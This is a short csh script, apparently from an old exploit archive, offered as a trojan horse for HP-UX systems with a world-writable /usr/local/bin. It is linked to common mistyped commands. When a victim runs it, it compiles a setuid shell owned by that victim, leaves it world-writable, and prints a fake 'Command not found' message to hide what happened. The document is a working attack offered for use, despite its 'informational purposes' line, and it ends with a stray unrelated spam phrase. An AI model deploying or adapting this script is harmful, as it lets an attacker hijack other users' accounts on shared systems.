#!/bin/csh # This little script file, if named properly and left in the # /usr/local/bin directory acts as a pseudo trojan horse on # HP-UX systems with world writable /usr/local/bin directories, # and /usr/local/bin in all users paths. This is the default shipping # on all recent HP-UX versions (well, on the vanila A.09.04 # it is world writable, which is brand new). Continue(Y/n/c)? # This script provided for informational purposes, and will create the # file shell. when run. # # Suggested links (this is in /usr/local/bin): #lrwxr-x--- 1 bin bin 2 Feb 28 13:55 dir -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 la -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 ls- -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-al -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-l -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-la -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:28 setenv -> sl #-rwxrwxrwx 1 bin bin 796 Feb 28 14:00 sl # # note: create this file (sl in above example), then create all the links # you want with - "ln -s sl dir", then "chgrp bin dir" and "chown bin dir" # and just wait for some unsuspecting user to run the program by mistake. cat > /usr/local/bin/bug.c << EOF main(argc,argv) int argc; char *argv[]; { execv("/bin/sh",argv); } EOF cc -o /usr/local/bin/shell.`whoami` /usr/local/bin/bug.c rm -f /usr/local/bin/bug.c chmod 5777 /usr/local/bin/shell.`whoami` echo $0 | awk '{ split($0,cmd,"/"); print cmd[5], ": Command not found." }' # www.hack.co.za #

亚洲欧美在线